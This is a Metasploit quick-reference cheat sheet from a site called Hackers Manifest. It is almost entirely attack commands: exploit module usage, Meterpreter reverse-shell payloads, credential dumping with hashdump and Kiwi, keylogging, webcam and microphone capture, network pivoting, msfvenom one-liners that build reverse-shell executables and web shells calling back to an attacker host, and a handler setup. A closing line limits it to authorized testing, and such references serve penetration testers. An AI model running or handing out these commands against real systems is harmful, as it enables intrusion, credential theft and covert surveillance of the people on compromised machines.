Metasploit Quick Reference
Hackers Manifest - hackersmanifest.com
Exploitation framework commands, payloads, and Meterpreter reference.
Starting Metasploit
| Start console | msfconsole |
| Quiet mode | msfconsole -q |
| Init database | msfdb init |
| Start database | msfdb start |
| Check DB status | db_status |
| Run script | msfconsole -r script.rc |
| Update MSF | msfupdate |
Basic Commands
| Search modules | search type:exploit smb |
| Search by CVE | search cve:2017-0144 |
| Use module | use exploit/windows/smb/... |
| Module info | info |
| Show options | show options |
| Set option | set RHOSTS 10.0.0.10 |
| Global set | setg LHOST 10.0.0.5 |
| Run exploit | exploit or run |
| Run as job | exploit -j |
| Go back | back |
Common Payloads
| Win x64 Meterpreter | windows/x64/meterpreter/reverse_tcp |
| Win x86 Meterpreter | windows/meterpreter/reverse_tcp |
| Linux Meterpreter | linux/x64/meterpreter/reverse_tcp |
| Windows Shell | windows/shell/reverse_tcp |
| PHP Meterpreter | php/meterpreter/reverse_tcp |
| Java Meterpreter | java/meterpreter/reverse_tcp |
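Staged (`/` in the payload name, e.g. meterpreter/reverse_tcp) = smaller, needs handler | Stageless (`_` in the payload name, e.g. meterpreter_reverse_tcp) = larger, standalone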
Meterpreter - System
| System info | sysinfo |
| Current user | getuid |
| Get PID | getpid |
| List processes | ps |
| Migrate to PID | migrate PID |
| Elevate privs | getsystem |
| Dump hashes | hashdump |
| Load Kiwi | load kiwi |
| All credentials | creds_all |
Meterpreter - Files
| Working dir | pwd |
| Change dir | cd C:\\ |
| List files | ls |
| Read file | cat file.txt |
| Download | download file.txt /local/ |
| Upload | upload local.txt C:\\ |
| Edit file | edit file.txt |
| Search | search -f *.txt |
Meterpreter - Network
| IP config | ipconfig |
| Routes | route |
| Port forward | portfwd add -l 8080 -p 80 -r IP |
| List forwards | portfwd list |
| ARP scan | run arp_scanner -r 10.0.0.0/24 |
| Route add | run autoroute -s 10.0.0.0/24 |
Post-Exploitation
| Screenshot | screenshot |
| Start keylogger | keyscan_start |
| Dump keystrokes | keyscan_dump |
| Webcam snap | webcam_snap |
| Record mic | record_mic |
| Shell | shell |
| Background | background |
| Sessions list | sessions -l |
| Interact | sessions -i 1 |
msfvenom Payloads
| Windows EXE | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe |
| Linux ELF | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell |
| PHP | msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php |
| ASP | msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f asp -o shell.asp |
| WAR | msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.war |
| Python | msfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw |
Multi Handler Setup
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j

Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com